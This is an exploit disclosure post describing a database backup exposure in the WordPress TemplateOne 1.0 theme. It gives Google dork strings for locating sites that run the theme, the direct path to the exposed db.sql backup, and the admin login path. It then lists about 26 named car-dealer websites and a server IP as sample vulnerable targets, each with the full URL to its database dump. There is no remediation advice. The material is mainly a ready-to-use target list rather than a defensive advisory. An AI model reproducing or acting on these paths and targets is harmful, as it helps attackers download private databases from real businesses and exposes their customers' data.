################################################################################################# # Exploit Title : WordPress TemplateOne Themes 1.0 Database Backup Disclosure # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 02/12/2018 # Vendor Homepage : wordpress.org ~ dubicars.com # Software Download Link : N/A # Tested On : Windows and Linux # Category : WebApps # Version Information : 1.0 # Google Dorks : inurl:''/wp-content/themes/templateone/'' intext:''A(c) Copyright 2015 | Powered by Dubicars'' intext:''A(c) Copyright 2017 | Powered by Dubicars'' intext:''A(c) Copyright 2018 | Powered by Dubicars'' intext:''Powered by Dubicars'' # Exploit Risk : Medium # CxSecurity Exploit Link : cxsecurity.com/issue/WLB-2018110153 # Exploit4Arab Exploit Link : exploit4arab.org/exploits/2247 # ExploitAlert Exploit Link : exploitalert.com/view-details.html?id=31482 # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ] CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ] CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ] ################################################################################################# # Admin Panel Login Path : /wp-login.php # Exploit : /wp-content/themes/templateone/db.sql ################################################################################################# # Example Vulnerable Sites => Vulnerable IP Address => (108.179.230.34) There are 236 domains hosted on this server. [+] simurghcars.ae/wp-content/themes/templateone/db.sql [+] romeocars.ae/wp-content/themes/templateone/db.sql [+] katrjimotors.com/wp-content/themes/templateone/db.sql [+] algharymotors.ae/wp-content/themes/templateone/db.sql [+] alaramcars.com/wp-content/themes/templateone/db.sql [+] alsalamamotors.com/wp-content/themes/templateone/db.sql [+] diamondclassmotors.com/wp-content/themes/templateone/db.sql [+] tantoauto.com/wp-content/themes/templateone/db.sql [+] storyauto-middleeast.com/wp-content/themes/templateone/db.sql [+] tantoauto.com/wp-content/themes/templateone/db.sql [+] whitemotors.org/wp-content/themes/templateone/db.sql [+] 555motors.ae/wp-content/themes/templateone/db.sql [+] tahanmotors.com/wp-content/themes/templateone/db.sql [+] binhumaidan.com/wp-content/themes/templateone/db.sql [+] formulaautofze.com/wp-content/themes/templateone/db.sql [+] alnayrabusedcarstrading.com/wp-content/themes/templateone/db.sql [+] exoticusedcarstr.com/wp-content/themes/templateone/db.sql [+] dairausedcars.com/wp-content/themes/templateone/db.sql [+] usmotorsuae.com/wp-content/themes/templateone/db.sql [+] saleemmotors.com/wp-content/themes/templateone/db.sql [+] moradmotors.com/wp-content/themes/templateone/db.sql [+] najemmotors.com/wp-content/themes/templateone/db.sql [+] jwmotors.net/wp-content/themes/templateone/db.sql [+] ibitisammotors.com/wp-content/themes/templateone/db.sql [+] classmotorsuae.com/wp-content/themes/templateone/db.sql [+] alshibamotors.com/wp-content/themes/templateone/db.sql ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################